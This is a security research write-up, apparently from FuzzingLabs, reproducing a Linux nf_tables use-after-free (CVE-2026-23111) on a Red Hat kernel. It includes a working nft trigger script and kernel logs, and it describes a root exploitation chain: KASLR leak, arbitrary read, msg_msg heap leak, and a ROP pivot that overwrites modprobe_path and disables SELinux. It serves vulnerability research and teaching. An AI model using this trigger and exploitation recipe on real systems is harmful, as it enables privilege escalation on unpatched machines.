Exploiting n-day in the wild

Reproducing CVE-2026-23111: How one character can change everything

To prepare for Pwn2Own Berlin 2026, we decided to reproduce a known kernel CVE on Red Hat (kernel 6.12.0-124.38.1.el10_1, which was the latest version at the time). We chose the nf_tables subsystem because we were not very familiar with it and wanted to better understand its internals.

TL;DR

An inverted condition on the catchall element in the Abort Phase of nf_tables transactions allows an unprivileged user to trigger a use-after-free. This UAF can be used to leak the kernel base address, then a heap address, and finally to execute a ROP chain that stack-pivots into msg_msg-2k to get root privileges.

What is nf_tables?

nf_tables is a subsystem of the Linux kernel that provides a framework for packet filtering. It is used by the nft CLI tool to manage firewall rules, and it is a replacement for the older subsystems iptables, ip6tables, arptables, and ebtables.



In order to filter packets, nf_tables uses different objects (image from this video):

At a high level, nf_tables is organized as a hierarchy: a table is the top-level container (usually per protocol family), which contains one or more chains that define packet-processing paths. Each chain is an ordered list of rules, and each rule is built from one or more expressions evaluated in sequence. A set is a reusable lookup structure that rules can query efficiently instead of hardcoding many individual conditions.

First look at the bug

Let’s first have a look at the CVE description:

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate(). nft_map_catchall_activate() has an inverted element activity check compared to its non-catchall counterpart nft_mapelem_activate() and compared to what is logically required. nft_map_catchall_activate() is called from the abort path to re-activate catchall map elements that were deactivated during a failed transaction. It should skip elements that are already active (they don’t need re-activation) and process elements that are inactive (they need to be restored). Instead, the current code does the opposite: it skips inactive elements and processes active ones. Compare the non-catchall activate callback, which is correct:

nft_mapelem_activate():

if (nft_set_elem_active(ext, iter->genmask)) return 0; /* skip active, process inactive */

With the buggy catchall version: nft_map_catchall_activate():

if (!nft_set_elem_active(ext, genmask)) continue; /* skip inactive, process active */

The consequence is that when a DELSET operation is aborted, nft_setelem_data_activate() is never called for the catchall element. For NFT_GOTO verdict elements, this means nft_data_hold() is never called to restore the chain->use reference count. Each abort cycle permanently decrements chain->use. Once chain->use reaches zero, DELCHAIN succeeds and frees the chain while catchall verdict elements still reference it, resulting in a use-after-free. This is exploitable for local privilege escalation from an unprivileged user via user namespaces + nftables on distributions that enable CONFIG_USER_NS and CONFIG_NF_TABLES. Fix by removing the negation so the check matches nft_mapelem_activate(): skip active elements, process inactive ones.



Luckily for us, the CVE description gives us a lot of information. Before diving into nf_tables, let’s have a look at the patch:

A single character was removed: an exclamation mark. That tiny negation was enough to invert the activation logic in the abort path, which eventually enables a use-after-free.
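To make the effect of that single character concrete, here is a minimal Python sketch of the two checks. It is a toy model, not kernel code: the `Elem` class, its `active` flag (standing in for `nft_set_elem_active(ext, genmask)`) and the `reactivated` marker are names we made up for illustration.

```python
from dataclasses import dataclass


@dataclass
class Elem:
    name: str
    active: bool               # stand-in for nft_set_elem_active(ext, genmask)
    reactivated: bool = False  # set when the abort path restores the element


def activate_fixed(elems):
    """Patched logic: skip active elements, restore inactive ones."""
    for e in elems:
        if e.active:
            continue
        e.active = True
        e.reactivated = True


def activate_buggy(elems):
    """Pre-patch logic: the extra negation skips exactly the inactive elements."""
    for e in elems:
        if not e.active:
            continue
        e.reactivated = True


def deactivated_catchall():
    # State after the prepare phase of a DELSET: the catchall element is inactive.
    return [Elem("catchall", active=False)]


fixed, buggy = deactivated_catchall(), deactivated_catchall()
activate_fixed(fixed)
activate_buggy(buggy)
print(fixed[0].reactivated, buggy[0].reactivated)  # True False
```

With the negation in place, the element that needs restoring is the one that gets skipped, so whatever the restore step was supposed to undo stays undone.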

Understanding the bug

From the description, there is an inverted condition in nft_map_catchall_activate(). This function is used during the Abort Phase to reactivate the catchall elements in a map.



To better understand what this means, let’s review the different nf_tables transaction phases when sending a batch (i.e., several requests at once). (Image from this video.)

When a batch arrives, the different commands are processed in the Prepare phase. This phase does not modify elements “in place”, but builds what we call the next generation. If there is no failure during the Prepare phase, the next generation becomes the current generation during the Commit phase. However, if there is an issue, the Abort Phase is invoked and unwinds the different actions performed during the Prepare phase in reverse order to restore the original state.
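The three phases can be sketched with a small Python model. This is only an illustration under simplifying assumptions: the `Transaction` class, its undo log of names and the `run_batch` helper are hypothetical, and the real kernel tracks generations with per-object bitmasks rather than a copied set.

```python
class Transaction:
    def __init__(self, live):
        self.live = live            # current generation
        self.staged = set(live)     # next generation being prepared
        self.undo_log = []          # one entry per prepared command
        self.undone = []            # order in which commands were unwound
        self.committed = False

    def prepare_delete(self, name):
        if name not in self.staged:
            raise KeyError(name)    # the command fails, so the batch fails
        self.staged.remove(name)
        self.undo_log.append(name)

    def commit(self):
        self.live.clear()
        self.live.update(self.staged)
        self.committed = True

    def abort(self):
        # Unwind in reverse order of preparation.
        for name in reversed(self.undo_log):
            self.staged.add(name)
            self.undone.append(name)
        self.undo_log.clear()


def run_batch(live, deletions):
    txn = Transaction(live)
    try:
        for name in deletions:
            txn.prepare_delete(name)
    except KeyError:
        txn.abort()
        return txn
    txn.commit()
    return txn


live = {"mymap", "triggermap", "othermap"}
failed = run_batch(live, ["triggermap", "othermap", "bonjour"])
print(failed.committed, failed.undone)  # False ['othermap', 'triggermap']
```

The important property is that a failed batch must leave every side effect of the prepare phase undone; the bug discussed here is one side effect that the abort path forgets.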



With that in mind, we can better understand the bug. If we send a batch that contains:

- a first command that deletes a map which contains a catchall element (sometimes represented by a “*”, because it catches everything)

- a second command that fails

Then during the Abort Phase, the function nft_map_catchall_activate(), which normally reactivates elements in the catchall part of the map, will not reactivate them.

The description of the bug gives us even more information: if inside this catchall element we have a verdict of type GOTO (something like { * : goto chainX }), then nft_data_hold() will never be called to restore the chain->use variable, which counts the number of references to a chain. This allows us to decrement this variable as many times as we want, and then delete and free this chain while some objects still refer to it (use-after-free).
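The reference-count drift can be followed with a toy simulation. The classes and helper names below are ours, and the model only tracks the counter; it assumes, as the CVE description states, that deactivation drops one reference and that a correct abort takes it back.

```python
class Chain:
    def __init__(self, name):
        self.name = name
        self.use = 0
        self.freed = False


class Map:
    def __init__(self, name, target):
        self.name = name
        self.target = target
        target.use += 1          # the catchall goto verdict holds a reference


def aborted_delete(m, buggy):
    m.target.use -= 1            # prepare phase: deactivation drops the reference
    if not buggy:
        m.target.use += 1        # abort phase: reference restored
    # buggy=True models the inverted check: the restore step is skipped


def delete_map(m):
    m.target.use -= 1


def delete_chain(chain):
    if chain.use > 0:
        return False             # the kernel refuses to delete a chain still in use
    chain.freed = True
    return True


def scenario(buggy):
    chain = Chain("mychain")
    mymap = Map("mymap", chain)
    trigger = Map("triggermap", chain)
    aborted_delete(trigger, buggy)   # batch: delete triggermap, then fail
    delete_map(mymap)
    deleted = delete_chain(chain)
    dangling = deleted and trigger.target.freed
    return chain.use, deleted, dangling


print(scenario(buggy=False))  # (1, False, False)
print(scenario(buggy=True))   # (0, True, True)
```

In the buggy run, triggermap was never actually deleted, yet the chain it points to is gone: that is the dangling reference.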

This simplified diagram shows the different steps to trigger the bug:

Reproduction in Bash

To make sure we understood this bug, we tried to trigger this UAF using the nft CLI tool. Here is our commented script:

#!/bin/sh

FILE_BASH="file_bash"

# clean the environment

nft flush ruleset

rm -f "$FILE_BASH"

# create a table mytable

nft add table inet mytable

# create a chain mychain inside this table

nft add chain inet mytable mychain

# add to the table a map "mymap" with a default element, which will not be important here

nft add map inet mytable mymap { type ipv4_addr : verdict \; }

# add the catchall element with a goto verdict to "mychain"

nft add element inet mytable mymap { \* : goto mychain }

# same thing for the second map "triggermap"

nft add map inet mytable triggermap { type ipv4_addr : verdict \; }

nft add element inet mytable triggermap { \* : goto mychain }

# Create a batch that first deletes a map, then tries to delete something that does not exist, in order to fail the batch and go into the abort phase

cat > "$FILE_BASH" << 'BATCH_CONTENT'

delete map inet mytable triggermap

delete map inet mytable bonjour

BATCH_CONTENT

# execute the batch

nft -f "$FILE_BASH"

# here mychain->use should be decremented because the abort phase did not recover properly. We can abuse that by making the use counter reach 0 and then deleting the chain to get a UAF.

nft delete map inet mytable mymap

nft delete chain inet mytable mychain

# we should now have triggermap with a catchall element that points to a chain which no longer exists

# listing chains, maps, and sets

echo "CHAINS:"

nft list chains

echo "MAPS:"

nft list maps

echo "SETS:"

nft list sets

This gives us (we added some logs in the kernel):

[ 34.575666] nf_tables_newsetelem called

[ 34.576027] nft_add_set_elem called

[ 34.580254] nft (314) used greatest stack depth: 11272 bytes left

[ 34.584135] nf_tables_newsetelem called

[ 34.584382] nft_add_set_elem called

[ 34.589736] nft_verdict_uninit: chain use before : 2

[ 34.590023] nft_verdict_uninit: chain use after : 1

[ 34.590330] nf_tables_abort called

[ 34.590619] __nf_tables_abort: reversing type=NFT_MSG_DELSET

[ 34.590942] type of element in DELSET is NFT_SET_MAP

[ 34.591218] interesting

[ 34.591363] nft_map_activate called

[ 34.591613] nft_map_catchall_activate called

[ 34.591851] chain number of use 1

file_bash:2:25-31: Error: Could not process rule: No such file or directory

delete map inet mytable bonjour

^^^^^^^

[ 34.608980] nft_verdict_uninit: chain use before : 1

[ 34.609417] nft_verdict_uninit: chain use after : 0

[ 34.626538] nf_tables_delchain called

[ 34.633648] nf_tables_chain_destroy called

[ 34.635331] kfree chain->name @ 0xffff888009fa2b10

[ 34.636627] kfree chain->udata @ 0x0000000000000000

[ 34.637953] kfree chain @ 0xffff888009dc1680

CHAINS:

table inet mytable {

}

MAPS:

table inet mytable {

map triggermap {

type ipv4_addr : verdict

elements = { * : goto �,� �����*� ���� }

}

}

SETS:

table inet mytable {

}

With these logs, we can clearly see that we entered the Abort Phase, that nft_map_catchall_activate was called and never restored the chain->use variable, which allowed us to destroy the chain while triggermap still had a reference to it. The corrupted chain name while listing the maps clearly shows a UAF.

Exploitation

What do we have exactly?



It is now time to dive into the different structures and identify the exact primitive we obtained. As mentioned before, our map still has a reference to the nft_chain structure, which has now been freed:





This structure is in the kmalloc-cg-128 cache, and for the first phase of this exploit, we will use its name field to obtain an arbitrary leak. This field also goes into kmalloc-cg-* caches, but the cache size depends on the size of the name.

/**

* struct nft_chain - nf_tables chain

*

* @blob_gen_0: rule blob pointer to the current generation

* @blob_gen_1: rule blob pointer to the future generation

* @rules: list of rules in the chain

* @list: used internally

* @rhlhead: used internally

* @table: table that this chain belongs to

* @handle: chain handle

* @use: number of jump references to this chain

* @flags: bitmask of enum NFTA_CHAIN_FLAGS

* @bound: bind or not

* @genmask: generation mask

* @name: name of the chain

* @udlen: user data length

* @udata: user data in the chain

* @blob_next: rule blob pointer to the next in the chain

* @vstate: validation state

*/

struct nft_chain {

struct nft_rule_blob __rcu *blob_gen_0;

struct nft_rule_blob __rcu *blob_gen_1;

struct list_head rules;

struct list_head list;

struct rhlist_head rhlhead;

struct nft_table *table;

u64 handle;

u32 use;

u8 flags:5,

bound:1,

genmask:2;

char *name;

u16 udlen;

u8 *udata;

/* Only used during control plane commit phase: */

struct nft_rule_blob *blob_next;

struct nft_chain_validate_state vstate;

};

Leaking kbase



The first phase of this exploit is the same as in this write-up. We will use struct seq_operations to leak the kernel base address: this structure is allocated in kmalloc-cg-32, and when it is set up by single_open(), its first field (start) points to the single_start function.

struct seq_operations {

void * (*start) (struct seq_file *m, loff_t *pos);

void (*stop) (struct seq_file *m, void *v);

void * (*next) (struct seq_file *m, void *v, loff_t *pos);

int (*show) (struct seq_file *m, void *v);

};

Therefore, we just have to trigger our UAF, then spray struct seq_operations in kmalloc-cg-32 so that one of these structs takes the place of the old name.

For this first part, the name must have a size that places it in kmalloc-cg-32, for example a size of 21.
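As a rough aid for picking sizes, the following sketch maps an allocation size to a cache name. The list of size classes is an assumption (the usual general-purpose classes on x86_64); the helper names are hypothetical, and real kernels can differ depending on their configuration.

```python
# Assumed general-purpose kmalloc size classes on x86_64, in bytes.
KMALLOC_CLASSES = [8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192]


def kmalloc_class(size):
    """Return the smallest assumed size class that fits `size` bytes."""
    for c in KMALLOC_CLASSES:
        if size <= c:
            return c
    raise ValueError("larger than the biggest modelled class")


def cache_name(size, accounted=True):
    """Build a cache name; accounted allocations use the kmalloc-cg- prefix."""
    c = kmalloc_class(size)
    label = f"{c // 1024}k" if c >= 1024 else str(c)
    prefix = "kmalloc-cg-" if accounted else "kmalloc-"
    return prefix + label


print(cache_name(21))   # kmalloc-cg-32
print(cache_name(32))   # kmalloc-cg-32 (four 8-byte function pointers)
```

Under these assumptions, a 21-byte name and a 32-byte struct seq_operations compete for the same slots, which is what the spray relies on.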

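After these steps, we can list the maps and leak, through the chain name, the function pointer stored in the first field of the sprayed structure (single_start for files opened through single_open()). Because the name is printed as a C string, the output stops at the first null byte: if the pointer contains one, we cannot recover the full address. In this case, just reboot so that KASLR picks a new base. 🙂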
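The null-byte limitation is easy to see in a few lines of Python. The two pointer values below are made up for illustration, and the helper names are ours.

```python
import struct


def leak_as_c_string(pointer):
    """Return the bytes a C-string read would yield for a little-endian pointer."""
    raw = struct.pack("<Q", pointer)
    return raw.split(b"\x00", 1)[0]


def recover_pointer(leaked):
    """Rebuild the pointer, or return None when the string was cut short."""
    if len(leaked) < 8:
        return None
    return struct.unpack("<Q", leaked[:8])[0]


clean = 0xFFFFFFFF81234560      # hypothetical address without any null byte
unlucky = 0xFFFFFFFF81230060    # hypothetical address with a null second byte

print(recover_pointer(leak_as_c_string(clean)) == clean)  # True
print(recover_pointer(leak_as_c_string(unlucky)))         # None
```

Since the bytes are stored least-significant first, a null byte in the low part of the address hides everything above it.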

Leaking msg_msg-2k

You will understand why later, but our next objective is to leak the address of the slab msg_msg-2k.

To do so, we craft a stronger primitive: an arbitrary read. We trigger the same UAF as before, but instead of reallocating an object into the slot of the old name, we reallocate an object into the slot of the old nft_chain. With that done, we can place an arbitrary pointer at the offset of the name field, and listing the map then prints whatever that pointer refers to: an arbitrary read.

To do this, we again use a name string, but this time the name of an nft_table. struct nft_table itself is too large for kmalloc-cg-128, so it does not compete for the freed slot, while its name is allocated in kmalloc-cg-128 as long as we choose a suitable name length.

This gives us an arbitrary read. We already have the kernel base address, and we now want the address of an object in the msg_msg-2k slab. To get there, we start from one of the kernel global variables: init_ipc_ns, which is of type struct ipc_namespace.

struct ipc_namespace {

struct ipc_ids ids[3];

int sem_ctls[4];

int used_sems;

unsigned int msg_ctlmax;

unsigned int msg_ctlmnb;

unsigned int msg_ctlmni;

struct percpu_counter percpu_msg_bytes;

struct percpu_counter percpu_msg_hdrs;

size_t shm_ctlmax;

size_t shm_ctlall;

unsigned long shm_tot;

int shm_ctlmni;

/*

* Defines whether IPC_RMID is forced for _all_ shm segments regardless

* of shmctl()

*/

int shm_rmid_forced;

struct notifier_block ipcns_nb;

/* The kern_mount of the mqueuefs sb. We take a ref on it */

struct vfsmount *mq_mnt;

/* # queues in this ns, protected by mq_lock */

unsigned int mq_queues_count;

/* next fields are set through sysctl */

unsigned int mq_queues_max; /* initialized to DFLT_QUEUESMAX */

unsigned int mq_msg_max; /* initialized to DFLT_MSGMAX */

unsigned int mq_msgsize_max; /* initialized to DFLT_MSGSIZEMAX */

unsigned int mq_msg_default;

unsigned int mq_msgsize_default;

struct ctl_table_set mq_set;

struct ctl_table_header *mq_sysctls;

struct ctl_table_set ipc_set;

struct ctl_table_header *ipc_sysctls;

/* user_ns which owns the ipc ns */

struct user_namespace *user_ns;

struct ucounts *ucounts;

struct llist_node mnt_llist;

struct ns_common ns;

} __randomize_layout;

RHEL doesn’t use CONFIG_GCC_PLUGIN_RANDSTRUCT (more information in this blog post) so we don’t have to worry about __randomize_layout.

This structure contains something interesting: the different struct ipc_ids, with the first one being for semaphores, the second one for message queues, and the third one for shared memory (source). Using pahole, we can get the data structures recursively with their offsets (pahole -E -C ipc_namespace vmlinux):

struct ipc_namespace {

struct ipc_ids {

int in_use; /* 0 4 */

short unsigned int seq; /* 4 2 */

/* XXX 2 bytes hole, try to pack */

struct rw_semaphore {

/* typedef atomic_long_t -> atomic64_t */ struct {

/* typedef s64 -> __s64 */ long long int counter; /* 8 8 */

} count; /* 8 8 */

/* typedef atomic_long_t -> atomic64_t */ struct {

/* typedef s64 -> __s64 */ long long int counter; /* 16 8 */

} owner; /* 16 8 */

struct optimistic_spin_queue {

/* typedef atomic_t */ struct {

int counter; /* 24 4 */

} tail; /* 24 4 */

}osq; /* 24 4 */

/* typedef raw_spinlock_t */ struct raw_spinlock {

/* typedef arch_spinlock_t */ struct qspinlock {

union {

[...]

void * xa_head; /* 56 8 */

[...]

Inside this struct ipc_ids, there is a field named xa_head, which is the root of a radix tree. Before digging into radix trees, we can compute the offset of our first value to leak: address of init_ipc_ns + 224 (size of the first struct ipc_ids) + 56 (offset in the struct for xa_head) = init_ipc_ns + 0x118.
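The offset arithmetic can be double-checked in a couple of lines. The two sizes come from the pahole output quoted above; the index value 1 for the message-queue entry follows the ordering described in the text, and the function name is ours.

```python
SIZEOF_IPC_IDS = 224   # size of one struct ipc_ids, from pahole
OFFSET_XA_HEAD = 56    # offset of xa_head inside struct ipc_ids, from pahole
IPC_MSG_IDS = 1        # ids[0] = semaphores, ids[1] = message queues, ids[2] = shm


def xa_head_offset(index):
    """Offset of ids[index].xa_head from the start of struct ipc_namespace."""
    return index * SIZEOF_IPC_IDS + OFFSET_XA_HEAD


print(hex(xa_head_offset(IPC_MSG_IDS)))  # 0x118
```

These numbers are specific to the kernel build we analysed; on another build they have to be re-derived with pahole.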

From Wikipedia:

In computer science, a radix tree (also radix trie or compact prefix tree or compressed trie) is a data structure that represents a space-optimized trie (prefix tree) in which each node that is the only child is merged with its parent. The number of children of every internal node is at most the radix r of the radix tree, where r = 2^x for some integer x ≥ 1. Unlike regular trees, edges can be labeled with sequences of elements as well as single elements. This makes radix trees much more efficient for small sets (especially if the strings are long) and for sets of strings that share long prefixes.

In the Linux kernel, it is represented by struct xa_node in xarray.h:

/*

* @count is the count of every non-NULL element in the ->slots array

* whether that is a value entry, a retry entry, a user pointer,

* a sibling entry or a pointer to the next level of the tree.

* @nr_values is the count of every element in ->slots which is

* either a value entry or a sibling of a value entry.

*/

struct xa_node {

unsigned char shift; /* Bits remaining in each slot */

unsigned char offset; /* Slot offset in parent */

unsigned char count; /* Total entry count */

unsigned char nr_values; /* Value entry count */

struct xa_node __rcu *parent; /* NULL at top of tree */

struct xarray *array; /* The array we belong to */

union {

struct list_head private_list; /* For tree user */

struct rcu_head rcu_head; /* Used when freeing node */

};

void __rcu *slots[XA_CHUNK_SIZE];

union {

unsigned long tags[XA_MAX_MARKS][XA_MARK_LONGS];

unsigned long marks[XA_MAX_MARKS][XA_MARK_LONGS];

};

};

We are interested here in the message queue radix tree, so the slots array contains, when reaching a leaf, a pointer to struct msg_queue. Since this exploit is a PoC, we assumed that no previous message queues had been created before running it. Therefore, when creating the msg_queue in our exploit, it takes the first slot.
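To see why the first queue ends up in slots[0], here is a simplified model of how an index is resolved through xa_node levels. It assumes 64 slots per node (a chunk shift of 6, the common configuration) and ignores marks, tagged pointers and every other detail of the real implementation; `Node`, `slot_path` and `lookup` are hypothetical names.

```python
XA_CHUNK_SHIFT = 6                         # assumed: 64 slots per node
XA_CHUNK_MASK = (1 << XA_CHUNK_SHIFT) - 1


class Node:
    def __init__(self, shift):
        self.shift = shift                 # bits remaining below this level
        self.slots = [None] * (1 << XA_CHUNK_SHIFT)


def slot_path(index, top_shift):
    """List the slot chosen at each level, from the top node down to the leaf."""
    path = []
    shift = top_shift
    while shift >= 0:
        path.append((index >> shift) & XA_CHUNK_MASK)
        shift -= XA_CHUNK_SHIFT
    return path


def lookup(root, index):
    """Walk the tree until a non-node entry (or None) is reached."""
    node = root
    while isinstance(node, Node):
        node = node.slots[(index >> node.shift) & XA_CHUNK_MASK]
    return node


leaf = Node(shift=0)
leaf.slots[0] = "msg_queue #0"
print(slot_path(0, top_shift=0), lookup(leaf, 0))  # [0] msg_queue #0
```

With a single queue at index 0, the tree is one leaf node and the entry sits in its first slot, which matches the assumption made above.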

Using pahole again, we can find the second address to leak: first_leak + 0x28 (offset of slots[0]).

This will give us a pointer to a struct msg_queue:

/* one msq_queue structure for each present queue on the system */

struct msg_queue {

struct kern_ipc_perm q_perm;

time64_t q_stime; /* last msgsnd time */

time64_t q_rtime; /* last msgrcv time */

time64_t q_ctime; /* last change time */

unsigned long q_cbytes; /* current number of bytes on queue */

unsigned long q_qnum; /* number of messages in queue */

unsigned long q_qbytes; /* max number of bytes on queue */

struct pid *q_lspid; /* pid of last msgsnd */

struct pid *q_lrpid; /* last receive pid */

struct list_head q_messages;

struct list_head q_receivers;

struct list_head q_senders;

} __randomize_layout;

And here it is: q_messages, the doubly linked list that links our msg_msg objects. We just need its offset, again from pahole: second_leak + 0xc0 (the next pointer of the q_messages list head). With only three reads, we obtain the address of an object in the msg_msg-2k slab (assuming the first msg_msg we send is sized so that it lands in this cache).
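The three dependent reads can be summarised as a pointer chase. The sketch below runs against a dictionary of fake memory, not a real kernel: every address in it is invented, `read64` is a stand-in for the read primitive, and the three offsets are the ones quoted in the text for our build.

```python
OFF_XA_HEAD = 0x118      # init_ipc_ns -> ids[1] xa_head
OFF_SLOT0 = 0x28         # xa_node -> slots[0]
OFF_Q_MESSAGES = 0xC0    # msg_queue -> q_messages.next


def chase(read64, init_ipc_ns):
    """Follow the three pointers described above and return the last value."""
    first_leak = read64(init_ipc_ns + OFF_XA_HEAD)
    second_leak = read64(first_leak + OFF_SLOT0)
    return read64(second_leak + OFF_Q_MESSAGES)


# Fake memory with made-up addresses, only to exercise the logic.
INIT_IPC_NS = 0x1000
NODE = 0x2000
QUEUE = 0x3000
MSG = 0x4000
fake_memory = {
    INIT_IPC_NS + OFF_XA_HEAD: NODE,
    NODE + OFF_SLOT0: QUEUE,
    QUEUE + OFF_Q_MESSAGES: MSG,
}

print(hex(chase(fake_memory.__getitem__, INIT_IPC_NS)))  # 0x4000
```

Each read depends on the result of the previous one, which is why a reusable arbitrary read was needed rather than a one-shot leak.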

Controlling RIP



For this part, we used the same approach as in this write-up. The idea is the following:

- Find a way to trigger nft_chain_validate on the UAF chain.

- This function will go through each expression in each rule, and call expr->ops->validate, which is a function pointer inside the struct nft_expr_ops.

/** nft_chain_validate - loop detection and hook validation

*

* @ctx: context containing call depth and base chain

* @chain: chain to validate

*

* Walk through the rules of the given chain and chase all jumps/gotos

* and set lookups until either the jump limit is hit or all reachable

* chains have been validated.

*/

int nft_chain_validate(const struct nft_ctx *ctx, struct nft_chain *chain)

{

struct nft_expr *expr, *last;

struct nft_rule *rule;

int err;

BUILD_BUG_ON(NFT_JUMP_STACK_SIZE > 255);

if (ctx->level == NFT_JUMP_STACK_SIZE)

return -EMLINK;

if (ctx->level > 0) {

/* jumps to base chains are not allowed. */

if (nft_is_base_chain(chain))

return -ELOOP;

if (nft_chain_vstate_valid(ctx, chain))

return 0;

}

list_for_each_entry(rule, &chain->rules, list) {

if (fatal_signal_pending(current))

return -EINTR;

if (!nft_is_active_next(ctx->net, rule))

continue;

nft_rule_for_each_expr(expr, last, rule) {

if (!expr->ops->validate)

continue;

/* This may call nft_chain_validate() recursively,

* callers that do so must increment ctx->level.

*/

err = expr->ops->validate(ctx, expr);

if (err < 0)

return err;

}

cond_resched();

}

nft_chain_vstate_update(ctx, chain);

return 0;

}
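Stripped of the level checks and locking, the walk performed by this function looks like the following Python model. It is only a reading aid: the dataclasses mirror the field names used in the C code, and everything else (including the callbacks in the usage lines) is hypothetical.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Optional


@dataclass
class Ops:
    validate: Optional[Callable] = None   # mirrors expr->ops->validate


@dataclass
class Expr:
    ops: Ops


@dataclass
class Rule:
    exprs: List[Expr] = field(default_factory=list)
    active: bool = True                   # stand-in for nft_is_active_next()


def chain_validate(rules, ctx=None):
    """Call every validate callback reachable from the rule list."""
    for rule in rules:
        if not rule.active:
            continue
        for expr in rule.exprs:
            if expr.ops.validate is None:
                continue
            err = expr.ops.validate(ctx, expr)
            if err < 0:
                return err                # first failure stops the walk
    return 0


calls = []
ok = Ops(lambda ctx, expr: calls.append("ok") or 0)
bad = Ops(lambda ctx, expr: -22)
result = chain_validate([Rule([Expr(Ops()), Expr(ok)]), Rule([Expr(bad), Expr(ok)])])
print(result, calls)  # -22 ['ok']
```

The point to notice is that the callback is reached purely by following pointers that start in the chain: rule list, then expression, then ops, then validate.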

This is why we needed to leak a pointer from msg_msg-2k. We can now create pointers that point to a fake struct that we control completely.

Here is the “normal” state:

Here is what we are going to do:

We use the same technique as before: use the UAF to place table->name at the old location of nft_chain, then make the rules->next offset point to our msg_msg-2k leak + 0x30 (this is where we control the data, since msg_msg has metadata at the beginning of the structure). Then we replace our old msg_msg with one containing all fake pointers at precise offsets to simulate the different structures, until we can start our ROP chain at the old validate field. We are lucky because our first gadget is called with:

expr->ops->validate(ctx, expr)

Here, expr is a pointer to our fake nft_expr, which we control. This makes it easier to stack pivot into msg_msg-2k, since RSI already points to an address in that region.

As gadgets change between kernel builds, we will not go into detail on how to craft a ROP chain. We will just explain what we did and leave this exercise to the reader.

In our ROP chain, after stack pivoting into msg_msg-2k, we decided to modify modprobe_path in order to obtain root privileges (see this article). After modifying it, we also had to disable SELinux, as it would otherwise block the kernel from executing a file in /tmp or /home/user as modprobe_path. To do so, there is a global structure called selinux_state with an enforcing field that we have to set to 0. After that, we did not want to return to userland because we had completely corrupted the kernel stack, so we decided to put the hijacked task to sleep in kernel mode by calling msleep. This still allows us to trigger modprobe_path from another process.

After setting up all these structures, there is one last thing to do: trigger the call to nft_chain_validate. To do so, you can create a base chain and add a rule that uses the map with the UAF as the filter.

This will call nft_chain_validate, traverse all the fake structures, call the fake validate pointer (now your ROP chain), and achieve LPE!

Alexis & Lyes

About Us

Founded in 2021 and headquartered in Paris, FuzzingLabs is a cybersecurity startup specializing in vulnerability research, fuzzing, and blockchain security. We combine cutting-edge research with hands-on expertise to secure some of the most critical components in the blockchain ecosystem.
